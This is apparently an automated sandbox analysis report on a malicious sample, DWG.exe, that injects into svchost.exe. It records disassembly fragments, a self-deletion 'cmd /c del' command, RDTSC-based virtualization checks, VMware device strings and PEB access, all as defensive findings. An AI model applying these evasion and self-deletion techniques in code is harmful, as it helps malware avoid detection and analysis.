          Source: Binary string: wntdll.pdb source: DWG.exe, svchost.exe
          Source: Binary string: svchost.pdb source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
          Source: Binary string: svchost.pdbUGP source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004352E0 push eax; ret 0_2_0043530E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00461801 push ecx; iretd 0_2_00461833
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043691C push eax; ret 0_2_0043693A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B822 push eax; ret 5_2_0041B828
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B82B push eax; ret 5_2_0041B892
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B88C push eax; ret 5_2_0041B892
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004153DF pushfd ; iretd 5_2_004153E5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004195E8 push eax; retf 5_2_004195EF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00ACD0D1 push ecx; ret 5_2_00ACD0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0377D0D1 push ecx; ret 10_2_0377D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F253DF pushfd ; iretd 10_2_02F253E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B88C push eax; ret 10_2_02F2B892
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B822 push eax; ret 10_2_02F2B828
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B82B push eax; ret 10_2_02F2B892
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2B7D5 push eax; ret 10_2_02F2B828
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F295E8 push eax; retf 10_2_02F295EF
          Source: DWG.exeStatic PE information: section name: .zrjfv
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043E8B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0043E8B9

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\svchost.exe Process created: /c del 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Windows\SysWOW64\svchost.exe Process created: /c del 'C:\Users\user\Desktop\DWG.exe'
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_0042D406 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_0042D406
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_00441490 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA, 0_2_00441490
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_00411790 IsIconic, 0_2_00411790
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_00440CE0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC, 0_2_00440CE0
Source: C:\Users\user\Desktop\DWG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\DWG.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DWG.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002F18604 second address: 0000000002F1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002F1899E second address: 0000000002F189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe TID: 4740 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_004088D0 rdtsc 5_2_004088D0
Source: C:\Users\user\Desktop\DWG.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_00436310 FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, 0_2_00436310
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_00449B06 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00449B06
Source: explorer.exe, 00000006.00000000.367292686.000000000EF3D000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.365065099.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000006.00000000.346085496.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.346085496.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000006.00000000.333633264.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}stemRoo
Source: explorer.exe, 00000006.00000000.337132635.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_0043E8B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0043E8B9
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_004088D0 rdtsc 5_2_004088D0
Source: C:\Users\user\Desktop\DWG.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_004592D8 mov ecx, dword ptr fs:[00000030h] 0_2_004592D8
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_0045DA58 mov eax, dword ptr fs:[00000030h] 0_2_0045DA58
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_0045DA68 mov eax, dword ptr fs:[00000030h] 0_2_0045DA68
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_0045DA88 mov eax, dword ptr fs:[00000030h] 0_2_0045DA88
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_0045DB28 mov eax, dword ptr fs:[00000030h] 0_2_0045DB28
Source: C:\Users\user\Desktop\DWG.exe Code function: 0_2_0045DDF8 mov eax, dword ptr fs:[00000030h] 0_2_0045DDF8
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AB90AF mov eax, dword ptr fs:[00000030h] 5_2_00AB90AF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAF0BF mov ecx, dword ptr fs:[00000030h] 5_2_00AAF0BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAF0BF mov eax, dword ptr fs:[00000030h] 5_2_00AAF0BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAF0BF mov eax, dword ptr fs:[00000030h] 5_2_00AAF0BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79080 mov eax, dword ptr fs:[00000030h] 5_2_00A79080
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF3884 mov eax, dword ptr fs:[00000030h] 5_2_00AF3884
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF3884 mov eax, dword ptr fs:[00000030h] 5_2_00AF3884
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h] 5_2_00A740E1
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h] 5_2_00A740E1
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h] 5_2_00A740E1
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A758EC mov eax, dword ptr fs:[00000030h] 5_2_00A758EC
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9B8E4 mov eax, dword ptr fs:[00000030h] 5_2_00A9B8E4
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9B8E4 mov eax, dword ptr fs:[00000030h] 5_2_00A9B8E4
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_00B0B8D0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h] 5_2_00B0B8D0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_00B0B8D0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_00B0B8D0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_00B0B8D0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_00B0B8D0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h] 5_2_00A8B02A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h] 5_2_00A8B02A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h] 5_2_00A8B02A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h] 5_2_00A8B02A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h] 5_2_00AA002D
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h] 5_2_00AA002D
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h] 5_2_00AA002D
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h] 5_2_00AA002D
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h] 5_2_00AA002D
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h] 5_2_00A9A830
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h] 5_2_00A9A830
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h] 5_2_00A9A830
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h] 5_2_00A9A830
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B44015 mov eax, dword ptr fs:[00000030h] 5_2_00B44015
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B44015 mov eax, dword ptr fs:[00000030h] 5_2_00B44015
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h] 5_2_00AF7016
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h] 5_2_00AF7016
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h] 5_2_00AF7016
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B32073 mov eax, dword ptr fs:[00000030h] 5_2_00B32073
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B41074 mov eax, dword ptr fs:[00000030h] 5_2_00B41074
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A90050 mov eax, dword ptr fs:[00000030h] 5_2_00A90050
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A90050 mov eax, dword ptr fs:[00000030h] 5_2_00A90050
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF69A6 mov eax, dword ptr fs:[00000030h] 5_2_00AF69A6
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA61A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA61A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA61A0 mov eax, dword ptr fs:[00000030h] 5_2_00AA61A0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h] 5_2_00AF51BE
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h] 5_2_00AF51BE
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h] 5_2_00AF51BE
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h] 5_2_00AF51BE
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h] 5_2_00A999BF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h] 5_2_00B349A4
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h] 5_2_00B349A4
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h] 5_2_00B349A4
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h] 5_2_00B349A4
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9C182 mov eax, dword ptr fs:[00000030h] 5_2_00A9C182
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAA185 mov eax, dword ptr fs:[00000030h] 5_2_00AAA185
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA2990 mov eax, dword ptr fs:[00000030h] 5_2_00AA2990
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00A7B1E1
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00A7B1E1
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_00A7B1E1
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B041E8 mov eax, dword ptr fs:[00000030h] 5_2_00B041E8
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h] 5_2_00A94120
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h] 5_2_00A94120
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h] 5_2_00A94120
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h] 5_2_00A94120
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A94120 mov ecx, dword ptr fs:[00000030h] 5_2_00A94120
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA513A mov eax, dword ptr fs:[00000030h] 5_2_00AA513A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA513A mov eax, dword ptr fs:[00000030h] 5_2_00AA513A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h] 5_2_00A79100
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h] 5_2_00A79100
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h] 5_2_00A79100
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7C962 mov eax, dword ptr fs:[00000030h] 5_2_00A7C962
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7B171 mov eax, dword ptr fs:[00000030h] 5_2_00A7B171
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7B171 mov eax, dword ptr fs:[00000030h] 5_2_00A7B171
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9B944 mov eax, dword ptr fs:[00000030h] 5_2_00A9B944
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9B944 mov eax, dword ptr fs:[00000030h] 5_2_00A9B944
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h] 5_2_00A752A5
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h] 5_2_00A752A5
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h] 5_2_00A752A5
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h] 5_2_00A752A5
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h] 5_2_00A752A5
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A8AAB0 mov eax, dword ptr fs:[00000030h] 5_2_00A8AAB0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A8AAB0 mov eax, dword ptr fs:[00000030h] 5_2_00A8AAB0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAFAB0 mov eax, dword ptr fs:[00000030h] 5_2_00AAFAB0
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAD294 mov eax, dword ptr fs:[00000030h] 5_2_00AAD294
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAD294 mov eax, dword ptr fs:[00000030h] 5_2_00AAD294
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA2AE4 mov eax, dword ptr fs:[00000030h] 5_2_00AA2AE4
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h] 5_2_00B34AEF
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA2ACB mov eax, dword ptr fs:[00000030h] 5_2_00AA2ACB
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h] 5_2_00A9A229
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AB4A2C mov eax, dword ptr fs:[00000030h] 5_2_00AB4A2C
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AB4A2C mov eax, dword ptr fs:[00000030h] 5_2_00AB4A2C
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A88A0A mov eax, dword ptr fs:[00000030h] 5_2_00A88A0A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B3AA16 mov eax, dword ptr fs:[00000030h] 5_2_00B3AA16
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B3AA16 mov eax, dword ptr fs:[00000030h] 5_2_00B3AA16
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7AA16 mov eax, dword ptr fs:[00000030h] 5_2_00A7AA16
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A7AA16 mov eax, dword ptr fs:[00000030h] 5_2_00A7AA16
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A93A1C mov eax, dword ptr fs:[00000030h] 5_2_00A93A1C
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h] 5_2_00A75210
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A75210 mov ecx, dword ptr fs:[00000030h] 5_2_00A75210
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h] 5_2_00A75210
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h] 5_2_00A75210
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AB927A mov eax, dword ptr fs:[00000030h] 5_2_00AB927A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B2B260 mov eax, dword ptr fs:[00000030h] 5_2_00B2B260
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B2B260 mov eax, dword ptr fs:[00000030h] 5_2_00B2B260
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B48A62 mov eax, dword ptr fs:[00000030h] 5_2_00B48A62
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B3EA55 mov eax, dword ptr fs:[00000030h] 5_2_00B3EA55
